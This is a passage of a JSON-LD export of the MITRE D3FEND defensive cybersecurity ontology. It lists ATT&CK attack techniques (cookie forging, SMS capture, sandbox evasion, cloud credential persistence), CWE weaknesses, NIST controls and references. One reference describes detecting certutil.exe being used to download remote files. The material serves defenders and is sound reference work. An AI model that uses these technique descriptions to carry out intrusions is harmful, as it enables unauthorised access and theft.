      "@id": "d3f:T1606.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1606.001",
      "d3f:definition": "Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.",
      "d3f:forges": {
        "@id": "d3f:SessionCookie"
      },
      "rdfs:label": "Web Cookies",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1606"
        },
        {
          "@id": "_:Nd026826e170d43a9986f9af894552d34"
        }
      ]
    },
    {
      "@id": "_:Nd026826e170d43a9986f9af894552d34",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:forges"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareBehaviorAnalysisVIPER",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://dl.acm.org/doi/pdf/10.1145/2046707.2046711"
      },
      "d3f:kb-abstract": "Recent research demonstrates that malware can infect peripherals' firmware in a typical x86 computer system, e.g., by exploiting vulnerabilities in the firmware itself or in the firmware update tools. Verifying the integrity of peripherals' firmware is thus an important challenge. We propose software-only attestation protocols to verify the integrity of peripherals' firmware, and show that they can detect all known software-based attacks.",
      "d3f:kb-author": "Yanlin Li, Jonathan M. McCune, Adrian Perrig",
      "d3f:kb-organization": "CyLab, Carnegie Mellon University",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareBehaviorAnalysis"
      },
      "d3f:kb-reference-title": "VIPER: Verifying the Integrity of PERipherals' Firmware",
      "rdfs:label": "Reference - Firmware Behavior Analysis VIPER"
    },
    {
      "@id": "d3f:SymmetricKey",
      "@type": "owl:Class",
      "d3f:definition": "A symmetric key is a single key used for both encryption and decryption and used with a symmetric-key algorithm. Symmetric-key algorithms are algorithms for cryptography that use the same cryptographic keys for both encryption of plaintext and decryption of ciphertext. The keys may be identical or there may be a simple transformation to go between the two keys. The keys, in practice, represent a shared secret between two or more parties that can be used to maintain a private information link. This requirement that both parties have access to the secret key is one of the main drawbacks of symmetric key encryption, in comparison to public-key encrytption (also known as asymmetric key encryption).",
      "rdfs:label": "Symmetric Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Symmetric-key_algorithm"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:NetworkFileResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:File"
      },
      "d3f:definition": "A computer file resource made available from one host to other hosts on a computer network.",
      "rdfs:label": "Network File Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkFileShareResource"
        },
        {
          "@id": "_:Naa3072c80c8549c9a76933122bc0cc47"
        }
      ]
    },
    {
      "@id": "_:Naa3072c80c8549c9a76933122bc0cc47",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:OTErrorMessage",
      "@type": "owl:Class",
      "d3f:definition": "An anticipated, reproducible defect occurred within the system.",
      "rdfs:comment": "BACnet: Error: 1\nBACnet: Error: 2\nBACnet: Error: 3\nBACnet: Error: 4\nBACnet: Error: 5\nBACnet: Error: 6\nBACnet: Error: 7\nBACnet: Error: 8",
      "rdfs:label": "OT Error Message",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:CWE-910",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-910",
      "d3f:definition": "The product uses or accesses a file descriptor after it has been closed.",
      "d3f:synonym": "Stale file descriptor",
      "rdfs:label": "Use of Expired File Descriptor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-672"
      }
    },
    {
      "@id": "d3f:T1412",
      "@type": "owl:Class",
      "d3f:attack-id": "T1412",
      "d3f:definition": "A malicious application could capture sensitive data sent via SMS, including authentication credentials. SMS is frequently used to transmit codes used for multi-factor authentication.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.004",
      "rdfs:label": "Capture SMS Messages - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Capture SMS Messages"
    },
    {
      "@id": "d3f:K-meansClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KMC",
      "d3f:definition": "K-means algorithm identifies k number of centroids, and then allocates every data point to the nearest cluster, while keeping the centroids as small as possible.",
      "d3f:kb-article": "## References\nTowards Data Science. (n.d.). Understanding K-means Clustering in Machine Learning. [Link](https://towardsdatascience.com/understanding-k-means-clustering-in-machine-learning-6a6e67336aa1)",
      "rdfs:label": "K-means Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Centroid-basedClustering"
      }
    },
    {
      "@id": "d3f:CWE-245",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-245",
      "d3f:definition": "The J2EE application directly manages connections, instead of using the container's connection management facilities.",
      "rdfs:label": "J2EE Bad Practices: Direct Management of Connections",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingMaliciousPayloads_VectraNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/EP3293937A1/en?oq=EP-3293937-A1"
      },
      "d3f:kb-abstract": "Disclosed is an improved method, system, and computer program product for identifying malicious payloads. The disclosed approach identifies potentially malicious payload exchanges which may be associated with payload injection or root-kit magic key usage.\n\nSome examples of data inputs:\n    Information for clients and servers, such as IP address and host information\n    Payloads for both clients and servers\n    Amount of data being transferred\n    Duration of communications\n    Length of time delay between client request and server response",
      "d3f:kb-author": "Nicolas Beauchesne; John Steven Mancini",
      "d3f:kb-mitre-analysis": "Extraction of network flow data and using unsupervised machine learning to create a standard baseline. During the monitoring phase, abnormal network metadata will result in an alert.",
      "d3f:kb-organization": "Vectra Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:Client-serverPayloadProfiling"
      },
      "d3f:kb-reference-title": "Method and system for detecting malicious payloads",
      "rdfs:label": "Reference - Method and system for detecting malicious payloads - Vectra Networks Inc"
    },
    {
      "@id": "d3f:CCI-001128_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs cryptographic mechanisms to recognize changes to information during transmission unless otherwise protected by alternative physical measures.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001128"
    },
    {
      "@id": "d3f:T0820",
      "@type": "owl:Class",
      "d3f:attack-id": "T0820",
      "d3f:definition": "Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to evade detection. Vulnerabilities may exist in software that can be used to disable or circumvent security features.",
      "rdfs:label": "Exploitation for Evasion - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "Exploitation for Evasion"
    },
    {
      "@id": "d3f:CWE-290",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-290",
      "d3f:definition": "This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.",
      "rdfs:label": "Authentication Bypass by Spoofing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Privilege Limitation for Production and Operation",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "CM-5(5)"
    },
    {
      "@id": "d3f:CWE-167",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-167",
      "d3f:definition": "The product receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided.",
      "rdfs:label": "Improper Handling of Additional Special Element",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-159"
        },
        {
          "@id": "d3f:CWE-228"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:CompilerConfigurationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file containing Information used to configure the parameters and initial settings for a compiler.",
      "rdfs:label": "Compiler Configuration File",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfigurationFile"
      }
    },
    {
      "@id": "d3f:T1670",
      "@type": "owl:Class",
      "d3f:attack-id": "T1670",
      "d3f:definition": "Adversaries may carry out malicious operations using virtualization solutions to escape from Android sandboxes and to avoid detection. Android uses sandboxes to separate resources and code execution between applications and the operating system.(Citation: Android Application Sandbox) There are a few virtualization solutions available on Android, such as the Android Virtualization Framework (AVF).(Citation: Android AVF Overview)",
      "rdfs:label": "Virtualization Solution - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Virtualization Solution"
    },
    {
      "@id": "d3f:T1578.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.003",
      "d3f:definition": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.",
      "d3f:deletes": [
        {
          "@id": "d3f:CloudInstanceMetadata"
        },
        {
          "@id": "d3f:Host"
        }
      ],
      "rdfs:label": "Delete Cloud Instance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:N4a47b47511a34c5cacd3c62abf755b5f"
        },
        {
          "@id": "_:N67604e84833f4f81aad7196b80c3dc64"
        }
      ]
    },
    {
      "@id": "_:N4a47b47511a34c5cacd3c62abf755b5f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "_:N67604e84833f4f81aad7196b80c3dc64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:TechniqueReference",
      "@type": "owl:Class",
      "d3f:definition": "A reference used to develop KB articles.",
      "d3f:pref-label": "Technique Reference",
      "rdfs:label": "Technique Reference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDKBThing"
        },
        {
          "@id": "_:N1f879e5b0d9b41bcad9b765f22440629"
        },
        {
          "@id": "_:Nd80491c3c83a43d1b7daebb92d462b9f"
        },
        {
          "@id": "_:N3ded7b369315463ca35a736e29fcf4a9"
        }
      ]
    },
    {
      "@id": "_:N1f879e5b0d9b41bcad9b765f22440629",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:kb-reference-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "_:Nd80491c3c83a43d1b7daebb92d462b9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-link"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:anyURI"
      }
    },
    {
      "@id": "_:N3ded7b369315463ca35a736e29fcf4a9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:kb-reference-title"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:HTTPURL",
      "@type": [
        "owl:NamedIndividual",
        "d3f:URL"
      ],
      "rdfs:label": "HTTP URL"
    },
    {
      "@id": "d3f:rating",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "rdfs:label": "rating",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-007%3ACertUtilDownloadWithVerifyCtlAndSplitArguments_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-007/"
      },
      "d3f:kb-abstract": "Certutil.exe may download a file from a remote destination using -VerifyCtl. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. \\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using -VerifyCtl, the file will either be written to the current working directory or %APPDATA%\\..\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\<hash>.",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments",
      "rdfs:label": "Reference - CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments - MITRE"
    },
    {
      "@id": "d3f:EmbeddedDatabaseApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software application that integrates a database management system (DBMS) directly within its own structure, rather than relying on a separate, standalone database server. Examples include SQLite and Berkeley DB.",
      "d3f:executes": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:manages": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Embedded Database Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DatabaseApplication"
        },
        {
          "@id": "_:Na98e6c58c3654bc0ac4fc94f86c2f353"
        },
        {
          "@id": "_:N0e1b55b6e2aa40b7accd312fd0d44610"
        }
      ]
    },
    {
      "@id": "_:Na98e6c58c3654bc0ac4fc94f86c2f353",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "_:N0e1b55b6e2aa40b7accd312fd0d44610",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:Reference-Wikipedia-ProximityCard",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://en.wikipedia.org/wiki/Proximity_card"
      },
      "d3f:kb-abstract": "Overview of proximity cards used in access control, their operating principles, and security aspects.",
      "d3f:kb-author": "Wikipedia contributors",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProximitySensorMonitoring"
      },
      "d3f:kb-reference-title": "Proximity card",
      "rdfs:label": "Reference - Wikipedia: Proximity card"
    },
    {
      "@id": "d3f:DS0022",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media)",
      "d3f:narrower": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the File Metadata component",
      "rdfs:label": "File (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1429",
      "@type": "owl:Class",
      "d3f:attack-id": "T1429",
      "d3f:definition": "Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information.",
      "rdfs:label": "Audio Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Audio Capture"
    },
    {
      "@id": "d3f:OTDeviceFirmwareCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Interact with the software responsible for low-level control of the system.",
      "rdfs:label": "OT Device Firmware Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:FileUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving changes to the content or metadata of an existing file, reflecting updates that alter its state or properties.",
      "rdfs:label": "File Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nebf9fa702a36433ea824f8fb021182b2"
        },
        {
          "@id": "_:N0a3dd4b9491f49458ee6cb08ea6c036b"
        }
      ]
    },
    {
      "@id": "_:Nebf9fa702a36433ea824f8fb021182b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "_:N0a3dd4b9491f49458ee6cb08ea6c036b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:CWE-863",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-863",
      "d3f:definition": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.",
      "d3f:synonym": "AuthZ",
      "rdfs:label": "Incorrect Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:T1497.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1497.002",
      "d3f:definition": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)",
      "rdfs:label": "User Activity Based Checks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1497"
      }
    },
    {
      "@id": "d3f:NonlinearRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NRL",
      "d3f:definition": "A supervised learning method that builds a non-linear regression model using training data.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Nonlinear regression. [Link](https://en.wikipedia.org/wiki/Nonlinear_regression)",
      "rdfs:label": "Nonlinear Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:NonlinearRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:T1098.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098.001",
      "d3f:creates": {
        "@id": "d3f:Credential"
      },
      "d3f:definition": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.",
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "Additional Cloud Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1098"
        },
        {
          "@id": "_:N57c59c9e05a34b36b934a9b3eaef3e91"
        },
        {
          "@id": "_:Nde21de28809e47afbdfc7d0562ed24d7"
        }
      ]
    },
    {
      "@id": "_:N57c59c9e05a34b36b934a9b3eaef3e91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "_:Nde21de28809e47afbdfc7d0562ed24d7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-3_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Maintenance Tools | Execution with Privilege",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "rdfs:label": "MA-3(5)"
    },
    {
      "@id": "d3f:HTTPResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an HTTP response is sent from a server to a client over an established TCP connection.",
      "rdfs:label": "HTTP Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HTTPEvent"
        },
        {
          "@id": "_:Nd3b45b2e0ac34ccfb034bc101237610b"
        }
      ]
    },
    {
      "@id": "_:Nd3b45b2e0ac34ccfb034bc101237610b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:CWE-1336",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1336",
      "d3f:definition": "The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine.",
      "d3f:synonym": [
        "Client-Side Template Injection / CSTI",
        "Server-Side Template Injection / SSTI"
      ],
      "rdfs:label": "Improper Neutralization of Special Elements Used in a Template Engine",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-94"
      }
    },
    {
      "@id": "d3f:RD-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001",
      "d3f:definition": "Adversaries assemble the people, platforms, and plumbing they will later use to observe, reach, or impersonate mission components. Infrastructure spans RF and optical ground assets (antennas, modems, timing sources, front-ends), compute and storage (on-prem and cloud), network presence (leased ASNs/IP space, VPS fleets, CDN relays), identity fabric (burner accounts, domains, certificates), and fabrication/test environments for hardware and software. They favor assets that are inexpensive, deniable, and geographically diverse, mixing self-hosted gear with commercial services and compromised third-party systems. To support spacecraft operations, they may build SDR-based labs that replicate waveforms and framing, stage command/telemetry tooling behind traffic mixers, and pre-position data pipelines for collection and analysis. The objective is persistence and flexibility: the ability to pivot between reconnaissance, delivery, and command with minimal attribution risk.",
      "rdfs:label": "Acquire Infrastructure - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Acquire Infrastructure"
    },
    {
      "@id": "d3f:UserGroup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "User groups are a way to collect user accounts and/or computer accounts into manageable units. Administrators can assign permissions, roles, or access to resources, as well as modify group membership, depending on the operating system.",
      "d3f:synonym": "Security Group",
      "rdfs:label": "User Group",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlGroup"
        },
        {
          "@id": "_:N36a7b19de33a4e11ac26d34f20b0d03c"
        }
      ]
    },
    {
      "@id": "_:N36a7b19de33a4e11ac26d34f20b0d03c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1021.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1021.003",
      "d3f:definition": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.",
      "rdfs:label": "Distributed Component Object Model",
      "rdfs:subClassOf": {
        "@id": "d3f:T1021"
      }
    },
    {
      "@id": "d3f:CWE-1255",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1255",
      "d3f:definition": "A device's real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token.",
      "rdfs:label": "Comparison Logic is Vulnerable to Power Side-Channel Attacks",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1300"
      }
    },
    {
      "@id": "d3f:DS0024",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations",
      "rdfs:comment": "This data source captures events relating to Windows registry keys and values and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Windows Registry (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1532",
      "@type": "owl:Class",
      "d3f:attack-id": "T1532",
      "d3f:definition": "Adversaries may compress and/or encrypt data that is collected prior to exfiltration. Compressing data can help to obfuscate its contents and minimize use of network resources. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.",
      "rdfs:label": "Archive Collected Data - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Archive Collected Data"
    },
    {
      "@id": "d3f:CWE-168",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-168",
      "d3f:definition": "The product does not properly handle input in which an inconsistency exists between two or more special characters or reserved words.",
      "rdfs:label": "Improper Handling of Inconsistent Special Elements",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-159"
        },
        {
          "@id": "d3f:CWE-228"
        },
        {
          "@id": "d3f:CWE-703"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1252",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1252",
      "d3f:definition": "The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory.",
      "rdfs:label": "CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:M1030",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:BroadcastDomainIsolation"
        },
        {
          "@id": "d3f:EncryptedTunnels"
        },
        {
          "@id": "d3f:InboundSessionVolumeAnalysis"
        },
        {
          "@id": "d3f:InboundTrafficFiltering"
        }
      ],
      "rdfs:label": "Network Segmentation"
    },
    {
      "@id": "d3f:HardwareTimerDeviceDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device driver for a hardware timer.",
      "d3f:drives": {
        "@id": "d3f:HardwareTimer"
      },
      "rdfs:label": "Hardware Timer Device Driver",
      "rdfs:seeAlso": {
        "@id": "https://www.intel.com/content/www/us/en/docs/programmable/743810/25-1/timer-device-drivers.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "_:N4891ec7a7e4b494bb4fe0678a579813d"
        }
      ]
    },
    {
      "@id": "_:N4891ec7a7e4b494bb4fe0678a579813d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareTimer"
      }
    },
    {
      "@id": "d3f:CCI-002724_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, upon detection of a potential integrity violation, initiates one or more of the following actions: generates an audit record; alerts the current user; alerts organization-defined personnel or roles; and/or organization-defined other actions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002724"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IA-2_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Identification and Authentication (organizational Users) | Local Access to Non-privileged Accounts",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
